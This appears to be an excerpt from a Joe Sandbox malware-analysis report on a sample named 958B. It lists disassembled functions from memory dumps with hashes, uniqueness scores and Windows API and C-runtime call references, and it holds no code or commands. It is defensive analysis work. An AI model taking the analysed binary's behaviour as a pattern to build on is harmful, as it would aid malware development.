Instruction ID: 581bca00ac74c31e38fb872daafff7ebfc0bab6b5e010a14ac791cd20898178f
Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
Instruction Fuzzy Hash: 9642C071629F119BC3DAEF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA91

Uniqueness

Uniqueness Score: -1.00%

Function 023FA026 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction ID: bd4402b7d4fcd04cf3c8c14a2181b12abc2760e773efe224c50cb27756bd04d5
Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction Fuzzy Hash: 1E22CE76904B028FC764CF19D08065AF7E1FF88324F558A6EE9ADA7B10D730BA55CB81

Uniqueness

Uniqueness Score: -1.00%

Function 023F2B60 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80

Uniqueness

Uniqueness Score: -1.00%

Function 023F3520 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction ID: 4dd51cf2e88b4848bbb8303109e524c77fc393717d6be40edbe50803480d562c
Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction Fuzzy Hash: 89028E711187058FC756EE1CE49035AF3E2FFC8309F19892DD68987B64E739A9198F82

Uniqueness

Uniqueness Score: -1.00%

Function 023F89D0 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction ID: 6f01391f53ff5761501ae7b41aa4a02c63963c0280ffe662f6e706afcdc48466
Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction Fuzzy Hash: EDC12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0

Uniqueness

Uniqueness Score: -1.00%

Function 023FB0B0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction ID: 3b0c25bb80f558618645096d24c921cfaeb3552e43e82a7bd4eb6f25b8f21dda
Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction Fuzzy Hash: CEA1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50

Uniqueness

Uniqueness Score: -1.00%

Function 023F30F0 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680

Uniqueness

Uniqueness Score: -1.00%

Function 023FCA10 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: eea68f0566f45d776a5978773f767070455a2576f2d336ee07e122ee2cda4cef
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 26C1ADB5E003099FCB54CFA9D881ADEFBF0FF48204F24856AE919E7301E334AA458B54

Uniqueness

Uniqueness Score: -1.00%

Function 023F5DE7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction ID: 0a17719961f340bb9434404f38d4a3bd520a4b7445f03de23c779cfd56aacda1
Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction Fuzzy Hash: D1B18460039FA686CBD3FF30911028BF7E0BFC525DF44194AD59986864EB3EE94E9215

Uniqueness

Uniqueness Score: -1.00%

Function 023F7520 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction ID: 861af791a28a840c12e4d9ea36e1f35f4ddf7d9c864bd259c2d9c42e3913d1f8
Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction Fuzzy Hash: 5B9114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0

Uniqueness

Uniqueness Score: -1.00%

Function 023FC760 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction ID: 22b3922ca288db4767149a566c2b80694a5b540db80e14256ffac3c5cfe8e465
Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction Fuzzy Hash: 01B17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64916AD915E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 023FA916 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction ID: e5cf9e0fb09e8403d5ccdcd630f953af56d63bd47e8c84522fcc5193841451a2
Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction Fuzzy Hash: F471D473A20B254B8314DEB9CD94192F2F1EF88610B57C27CCE84D7B45EB31B95A96C0

Uniqueness

Uniqueness Score: -1.00%

Function 023F59F7 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction ID: 5229223990b2502bbd8d69ebf92477bd1e095ea498a8b000b463dd3f42d4116d
Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction Fuzzy Hash: 6A8137B2A047019FC728CF19D885A6AF7E1FFD8210F15892DE99E83B41D770F8558B92

Uniqueness

Uniqueness Score: -1.00%

Function 023F8E60 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction ID: db0783ee614ae2362cda58f7b2a90504b6a8b4215c2265756a66164d2d14b64a
Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction Fuzzy Hash: 6F710622535B7A0AEBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4

Uniqueness

Uniqueness Score: -1.00%

Function 023FA699 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction ID: bb6f1ac913147ce68ebcd9dc9608f69a4b39fdbaea3c9bc3a58ed68fade02dde
Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction Fuzzy Hash: EA816875A10B669BD754CF2ED8C045AFBF1FB08210B518A2ADDA983B41D334F565CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 023F9120 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction ID: 07341fb2b1c92db899c14ea1f86851195b831ee2598ca81d928da69ed4488285
Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction Fuzzy Hash: 2F61A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 023F7A80 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction ID: 78be685b48be2d26e0fcd66763a9d36576450c9ef6fd310d0ddacf9a7b7bef49
Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction Fuzzy Hash: 27617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4

Uniqueness

Uniqueness Score: -1.00%

Function 023F7880 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction ID: b788812d6afbc1bfd89fb64a8a174592af618a650cd5733273df7c9f14d22e84
Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction Fuzzy Hash: 0D51DC229257B945EBC3DA3D88504AEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4

Uniqueness

Uniqueness Score: -1.00%

Function 023F7220 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 0226471C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, Offset: 02263000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2263000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 2d77e9dd95db6095a98bd8c78da1834f8c2c2fe4d96f901afe386791344d3429
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 01316936826282DFCB26DEB0D8D4AF6BB71EF87224F58959DC4C18B50AD3256086C794

Uniqueness

Uniqueness Score: -1.00%

Function 023F70E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82

Uniqueness

Uniqueness Score: -1.00%

Function 023F7393 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction ID: 25a86e83dae30893912733f8f6adfd659f20c55b6e60b29dc7b3c5e01323c618
Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction Fuzzy Hash: AF311430618345AFD751EF29D480A4BF7E1FFC8358F01D919F98897221D730E988CA62

Uniqueness

Uniqueness Score: -1.00%

Function 024118D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4e0473f625dc839b91eb24f8f0e30aaddb057f0c61b5fd3b1be8b079d5593c5f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D81108B726104243D614872ED5B46BBF395EBC622972C427BD3AE4B75CD322E145D900

Uniqueness

Uniqueness Score: -1.00%

Function 023FB000 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: ca8cbc0d5bf293677048f4869334aa8cfa6057e1f61d2f3eab2b53ade5bd4fa4
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: E711424A4492C4BDCF424A7840E56DBFFA58E3B218F4A71DAC4C44B743D01B150FE761

Uniqueness

Uniqueness Score: -1.00%

Function 023FA79A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction ID: b7fb70fd73d9792b8b1dae2b21527b433a6f76e725a87f0d296a93c20f83a177
Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction Fuzzy Hash: 910128768106629BD740DF3ED8C045AFBF1BB082117528B2ADC9483A41D334F666DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00404933 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

SetVolumeMountPointW.KERNEL32(wukovazitehohodoweb,potinifahax), ref: 00404964
OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 0040496D
EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00404975
GetWindowsDirectoryW.KERNEL32(?,00000000,?), ref: 004049DE
RemoveDirectoryA.KERNEL32(00000000), ref: 004049E5
WriteConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 00404A06
WriteConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00404A16
GetFileAttributesA.KERNEL32(00000000), ref: 00404A7B
BackupWrite.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00404AA8
GetVolumePathNameA.KERNEL32(sewomexikijalodedeleve soyugoloraci yamazid,?,00000000), ref: 00404ABB
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00404AEE
BeginUpdateResourceW.KERNEL32(00000000,00000000), ref: 00404B29

Strings

, xrefs: 004049AE
wukovazitehohodoweb, xrefs: 0040495F
sewomexikijalodedeleve soyugoloraci yamazid, xrefs: 00404AB6
d, xrefs: 00404A8B
potinifahax, xrefs: 0040495A

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: ConsoleWrite$DirectoryFileResourceUpdateVolume$AliasesAttributesBackupBeginCharacterInputLengthMappingMountNameOpenOutputPathPointRemoveWindows
String ID: $d$potinifahax$sewomexikijalodedeleve soyugoloraci yamazid$wukovazitehohodoweb
API String ID: 3921090981-798231047
Opcode ID: c984a35c5fd978b9c7cc7dfd1ca38fb396b8b615528d188fa5661a398d6f328a
Instruction ID: 87ee185074beea56d39e50044d3d0879882f27b56c1281c691d52274bea92d3a
Opcode Fuzzy Hash: c984a35c5fd978b9c7cc7dfd1ca38fb396b8b615528d188fa5661a398d6f328a
Instruction Fuzzy Hash: BE61E7B5D00209EFDB10CFA4DD849EEBBB8FB58315F14946AE545B3261D338AA44CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00404F96 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 00404FB9
__fileno.LIBCMT ref: 00404FCA
__fileno.LIBCMT ref: 00404FD6
__fileno.LIBCMT ref: 00404FE6
__fileno.LIBCMT ref: 00405007
__fileno.LIBCMT ref: 00405013
__fileno.LIBCMT ref: 0040501F
__fileno.LIBCMT ref: 0040502F
__fileno.LIBCMT ref: 00405050
__fileno.LIBCMT ref: 0040505C
__fileno.LIBCMT ref: 00405068
__fileno.LIBCMT ref: 00405078
__cftof.LIBCMT ref: 0040509E
__flsbuf.LIBCMT ref: 004050D6

Part of subcall function 00405A9D: __fileno.LIBCMT ref: 00405AA8

__flswbuf.LIBCMT ref: 00405107

Part of subcall function 00405FF9: __fileno.LIBCMT ref: 00406004

Strings

N@, xrefs: 00404FAA, 00404FB8, 00404FC9, 00404FD5, 00404FDE, 00405006, 00405012, 0040501E, 00405027, 0040504F, 0040505B, 00405067, 00405070, 004050D4, 00405105
N@, xrefs: 00405094, 004050CF, 004050BF, 00405099, 004050D5

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __fileno$__cftof__flsbuf__flswbuf
String ID: N@$N@
API String ID: 792820942-3347624943
Opcode ID: 6bb5b8c0a1901b4abf85ed9fb0c2b1fdde3c7d6086ae829146d2dd8996f0484f
Instruction ID: 7cd9c4c6eeb9f45161be54f2311e06bc8da88028723dcb38d93e897795e75482
Opcode Fuzzy Hash: 6bb5b8c0a1901b4abf85ed9fb0c2b1fdde3c7d6086ae829146d2dd8996f0484f
Instruction Fuzzy Hash: 9A412B72010925AAC3145B29AC459BF3764EF4232C335077FF466FB2D6DA3CD6528A9C

Uniqueness

Uniqueness Score: -1.00%

Function 02416437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0241644E

Part of subcall function 02419636: __calloc_impl.LIBCMT ref: 02419645

__calloc_crt.LIBCMT ref: 02416472
_free.LIBCMT ref: 02416480
__calloc_crt.LIBCMT ref: 0241648E
_free.LIBCMT ref: 0241649E
_free.LIBCMT ref: 024164A4
__copytlocinfo_nolock.LIBCMT ref: 024164B3
__setmbcp_nolock.LIBCMT ref: 024164D4
_free.LIBCMT ref: 024164E2
___removelocaleref.LIBCMT ref: 024164E9
___freetlocinfo.LIBCMT ref: 024164F0
_free.LIBCMT ref: 024164F6

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: c94523ed9855945b0a74ad6e9609c654b8b454a4573ca685b447ec5afb6c55a7
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7421F031144200AEEB217F67DD02E5F7BEADF81B60B52842FE58D551A4EB22C951CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02413F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02413F51

Part of subcall function 02415BA8: __getptd_noexit.LIBCMT ref: 02415BA8

__gmtime64_s.LIBCMT ref: 02413FEA
__gmtime64_s.LIBCMT ref: 02414020
__gmtime64_s.LIBCMT ref: 0241403D
__allrem.LIBCMT ref: 02414093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024140AF
__allrem.LIBCMT ref: 024140C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024140E4
__allrem.LIBCMT ref: 024140FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02414119
__invoke_watson.LIBCMT ref: 0241418A

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: c5c72ecbba92a6c9fdb0f3cdb7fea903530c6b2992c01c1d60c3ce1411aa916e
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: A571E272A00726ABE714DE7ACC80B6AB7FAAF14364F14427FE515E7780E770D9448B90

Uniqueness

Uniqueness Score: -1.00%

Function 0241650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 02416547
__calloc_crt.LIBCMT ref: 02416598
__lock.LIBCMT ref: 024165AE
__copytlocinfo_nolock.LIBCMT ref: 024165BF
_wcscmp.LIBCMT ref: 024165F9
__lock.LIBCMT ref: 02416610
__updatetlocinfoEx_nolock.LIBCMT ref: 02416622
___removelocaleref.LIBCMT ref: 02416628
__updatetlocinfoEx_nolock.LIBCMT ref: 02416647

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
